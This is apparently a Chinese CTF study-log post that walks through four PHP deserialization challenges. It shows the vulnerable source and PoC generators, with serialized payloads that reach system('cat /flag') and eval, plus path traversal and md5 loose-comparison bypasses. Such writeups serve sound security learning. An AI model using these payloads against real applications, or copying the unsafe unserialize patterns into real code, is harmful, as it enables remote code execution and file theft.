今天课比较多,只刷了4个题还是反序列化。明天继续反序列化
1.[第五空间 2021]pklovecloud
pop链比较简单就不分析了
<?php
include 'flag.php';
/**
 * Harmless default collaborator: the object acp::__construct() puts in
 * $cinder, so the expected echo_name() is this fixed greeting.
 */
class pkshow
{
    /** @return string a constant greeting; reads no state. */
    public function echo_name()
    {
        return 'Pk very safe^.^';
    }
}
class acp
{
    // protected: serializes with a "\0*\0" name prefix, so a payload carrying
    // it has to be URL-encoded to survive a query string (the writeup's
    // generator below does exactly that).
    protected $cinder;
    public $neutron;
    public $nova;
    // Only runs for `new acp`; unserialize() never calls it, so $cinder is
    // whatever the serialized data says it is.
    function __construct()
    {
        $this->cinder = new pkshow;
    }
    // Triggered by `echo $logData` at the bottom of the file. There is no type
    // check on $cinder: any object exposing echo_name() (ace, for instance) is
    // dispatched here. When $cinder is unset nothing is returned, which on
    // PHP 8 is a TypeError for __toString().
    function __toString()
    {
        if (isset($this->cinder))
            return $this->cinder->echo_name();
    }
}
class ace
{
    public $filename;
    public $openstack;
    public $docker;
    // Reached from acp::__toString() when $cinder is an ace. Everything it
    // consumes ($docker, $filename) comes from the deserialized payload.
    function echo_name()
    {
        // Second, nested unserialize() of attacker-supplied data. If the class
        // named in $docker is not declared in this file, the result is a
        // __PHP_Incomplete_Class (the OpenStack demo below produces such a string).
        $this->openstack = unserialize($this->docker);
        // $heat is never assigned here (it could only come from flag.php), so in
        // the plain reading this writes null. NOTE(review): on a
        // __PHP_Incomplete_Class the write appears to be dropped with a notice
        // rather than applied — that would explain why the writeup's payload
        // sets neutron and nova to the same string; confirm on the target PHP version.
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
            // $filename is unvalidated: "./" is a prefix, not a jail, so "../"
            // segments leave the directory (the writeup relies on this). The file
            // is read twice; the first read is only used as a truthiness test.
            $file = "./{$this->filename}";
            if (file_get_contents($file))
            {
                return file_get_contents($file);
            }
            else
            {
                return "keystone lost~";
            }
        }
    }
}
// Entry point: request data goes straight into unserialize(), the root sink
// of the chain — every property, including the protected $cinder, is whatever
// the client encoded. `echo` then invokes acp::__toString() on the result.
// A defensive version would accept JSON (json_decode) and never unserialize
// request input; at minimum unserialize()'s allowed_classes option bounds
// which classes can be instantiated.
if (isset($_GET['pks']))
{
    $logData = unserialize($_GET['pks']);
    echo $logData;
}
else
{
    highlight_file(__file__);
}
?>
下面的if的条件来分析一下
$this->openstack->neutron === $this->openstack->nova
<?php
// Stand-in carrying the two property names ace::echo_name() compares. It
// exists only to produce a serialized string; the challenge file itself never
// declares an OpenStack class.
class OpenStack {
    public $neutron;
    public $nova;
}
// Create an OpenStack object with both properties set to the same value...
$openstack = new OpenStack();
$openstack->neutron = "value"; // value of the neutron property
$openstack->nova = "value"; // value of the nova property (must match neutron for the === check)
// ...and print its serialized form; this string becomes ace::$docker in the payload.
$docker = serialize($openstack);
echo $docker;
?>
O:9:"OpenStack":2:{s:7:"neutron";s:5:"value";s:4:"nova";s:5:"value";}
<?php
// Generator-side mirror of the challenge's acp: same class name, property
// names and visibilities so the serialized form matches, but $cinder is seeded
// with an ace instead of the harmless pkshow.
class acp
{
    protected $cinder;
    public $neutron;
    public $nova;
    function __construct()
    {
        $this->cinder = new ace();
    }
}
// Data-only mirror of the challenge's ace; the method is not needed to
// serialize it. $docker holds the OpenStack string produced above.
class ace
{
    public $filename='flag.php';
    public $openstack;
    public $docker='O:9:"OpenStack":2:{s:7:"neutron";s:5:"value";s:4:"nova";s:5:"value";}';
}
$a=new acp();
// urlencode() because the protected $cinder serializes with NUL bytes in its
// name, which would not survive a raw query string.
echo urlencode(serialize($a));
?>
flag.php出现提示
然后把flag.php改为
../../../nssctfasdasdflag
2.[SWPUCTF 2022 新生赛]ez_1zpop
<?php
// Silences every warning and notice for the rest of the script, so nothing
// the magic methods below trigger shows up in the response.
error_reporting(0);
/**
 * Default collaborator for lt: the fmm() that runs when $impo was not
 * replaced by something else.
 */
class dxg
{
    /** @return string a constant refusal; reads no state. */
    public function fmm()
    {
        return 'nonono';
    }
}
class lt
{
    public $impo='hi';
    public $md51='weclome';
    public $md52='to NSS';
    // Only runs for `new lt`; unserialize() does not call it.
    function __construct()
    {
        $this->impo = new dxg;
    }
    // Runs after unserialize() and resets $impo to the harmless dxg. It is the
    // only guard on the chain, and the writeup notes it has to be bypassed —
    // a __wakeup() reset is not a substitute for not deserializing request
    // data in the first place. The return value of a __wakeup() is ignored.
    function __wakeup()
    {
        $this->impo = new dxg;
        return $this->impo->fmm();
    }
    // Reached via `echo $this` in __destruct(). The md5() results are compared
    // with loose ==, so two different strings whose hashes both have the form
    // "0e<digits>" compare equal as numbers (the values the writeup settles on
    // are of this kind); `!=` on the raw strings is loose as well. Use ===
    // (or hash_equals()) for any real comparison. Returns nothing when the
    // condition fails, which is a TypeError for __toString() on PHP 8.
    function __toString()
    {
        if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
            return $this->impo->fmm();
    }
    // Fires when the deserialized object is released, so the caller never has
    // to touch $Data for the chain to start.
    function __destruct()
    {
        echo $this;
    }
}
class fin
{
    public $a;
    public $url = 'https://www.ctfer.vip';
    public $title;
    // Called from lt::__toString() when $impo is a fin. $a is used as a
    // variable function and $title as its argument — both come straight from
    // the payload, so this is an unrestricted call of a caller-named function
    // with a caller-chosen argument. No allowlist; $url is never read.
    function fmm()
    {
        $b = $this->a;
        $b($this->title);
    }
}
// Entry point: unserialize() on raw request input. $Data is never used, but
// the object's __destruct() runs anyway when the script ends. Accepting JSON
// instead, or at least passing allowed_classes, would close this.
if (isset($_GET['NSS'])) {
    $Data = unserialize($_GET['NSS']);
} else {
    highlight_file(__file__);
}
pop链
fin fmm a=system title=ls
lt_tostring impo=new fin() md51=a[] md52=b[]
lt_destruct _wakeup()绕过
我想的是用数组去绕过比较,发现不行,看了wp他们用的是弱比较
$a->md51="s155964671a";
$a->md52="s214587387a";
public $md51='240610708';
public $md52='QNKCDZO';
poc
<?php
// Data-only mirror of the challenge's lt with the md5-colliding pair the
// writeup settled on. No __wakeup()/__destruct() here, so running this
// generator itself has no side effects beyond the echo below.
class lt
{
    public $impo;
    public $md51='s214587387a';
    public $md52='s155964671a';
}
// Data-only mirror of the challenge's fin; only the property defaults differ
// from the challenge definition.
class fin
{
    public $a='system';
    public $url = 'https://www.ctfer.vip';
    public $title='cat /flag';
}
$a=new lt();
$a->impo=new fin();
// Printed as-is; the writeup notes that __wakeup() still has to be
// accounted for separately.
echo serialize($a);
O:2:"lt":3:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:11:"s214587387a";s:4:"md52";s:11:"s155964671a";}
注意_wakeup()绕过
3. [MoeCTF 2021]unserialize
<?php
class entrance
{
    public $start;
    function __construct($start)
    {
        $this->start = $start;
    }
    // Chain start: calls helloworld() on whatever $start holds. If that object
    // has no such method, its __call() (springboard below) handles the call.
    function __destruct()
    {
        $this->start->helloworld();
    }
}
class springboard
{
    public $middle;
    // Catches the undefined helloworld() call. Reading the undeclared property
    // $hs on $middle in turn triggers __get() on that object (evil below).
    function __call($name, $arguments)
    {
        echo $this->middle->hs;
    }
}
class evil
{
    public $end;
    function __construct($end)
    {
        $this->end = $end;
    }
    // Sink: eval() of a property that unserialize() filled from the request.
    // Nothing on the path validates or restricts it.
    function __get($Attribute)
    {
        eval($this->end);
    }
}
// Entry point: the result is discarded, but the deserialized entrance's
// __destruct() still fires at shutdown, which is enough to walk the chain.
if(isset($_GET['serialize'])) {
    unserialize($_GET['serialize']);
} else {
    highlight_file(__FILE__);
}
pop分析
evil _get $end=system("ls");
springboard _call $middle=new evil()
entrance _destruct $start=new springboard()
poc
<?php
// Data-only mirror of the challenge's entrance: the constructor is dropped
// because only the serialized shape matters and unserialize() never calls it.
class entrance
{
    public $start;
}
// Same name and property as the challenge's springboard, minus __call().
class springboard
{
    public $middle;
}
// $end is the string the challenge's evil::__get() hands to eval().
class evil
{
    public $end='system("cat /flag");';
}
// Nest entrance -> springboard -> evil in the order the challenge's magic
// methods walk them, then print the serialized form.
$a=new entrance();
$a->start=new springboard();
$a->start->middle=new evil();
echo serialize($a);
O:8:"entrance":1:{s:5:"start";O:11:"springboard":1:{s:6:"middle";O:4:"evil":1:{s:3:"end";s:20:"system("cat /flag");";}}}
4. [FSCTF 2023]ez_php1
md5($a)==md5($b)绕过 ?b[]=a&a[]=b FL_AG=1
<?php
highlight_file(__FILE__);
error_reporting(0);
include "globals.php";
// Note the swap: $a receives ?b and $b receives ?a.
$a = $_GET['b'];
$b = $_GET['a'];
// Both comparisons are loose. On PHP 7 md5() of an array returns null with a
// warning that error_reporting(0) hides (PHP 8 throws a TypeError instead),
// so two distinct arrays satisfy both halves — the writeup's a[]/b[] trick.
// Strict === on the hashes, or rejecting non-string input, would close this.
if($a!=$b&&md5($a)==md5($b))
{
    echo "!!!";
    $c = $_POST['FL_AG'];
    if(isset($c))
    {
        // $ja is never assigned in this file, so unless globals.php defines it
        // preg_match() runs on null and the "bad guy" branch is unreachable.
        // The FL_AG value itself is never inspected.
        if (preg_match('/^.*(flag).*$/', $ja)) {
            echo 'You are bad guy!!!';
        }
        else {
            echo "Congratulation!!";
            // Presumably defined by globals.php — not visible here.
            echo $hint1;
        }
    }
    else {
        echo "Please input my love FL_AG";
    }
} else{
    die("game over!");
}
?>
自信的人直接手写payload ?str=s:10:"YES I love";
<?php
highlight_file(__FILE__);
// Hides every warning and notice for the rest of the script.
error_reporting(0);
class Clazz
{
    public $a;
    public $b;
    // Runs right after unserialize(): overwrites $a with the base64-encoded
    // source of g0t_f1ag.php, read through php://filter. The path is fixed, so
    // the concern is not traversal but that a deserialization hook reads a
    // sensitive file into object state at all.
    public function __wakeup()
    {
        $this->a = file_get_contents("php://filter/read=convert.base64-encode/resource=g0t_f1ag.php");
    }
    // Prints $b (not $a) when the object is released. The writeup leaves the
    // payload as an exercise; the defensive fix is unchanged from the earlier
    // challenges — do not unserialize request data.
    public function __destruct()
    {
        echo $this->b;
    }
}
// Entry point: POST body straight into unserialize(); the @ hides the notice
// from malformed input instead of handling it. The return value is discarded,
// but __wakeup() and __destruct() on the result still run.
@unserialize($_POST['data']);
?>
继续手写poc
不明白的看这个PHP反序列化(231119)-CSDN博客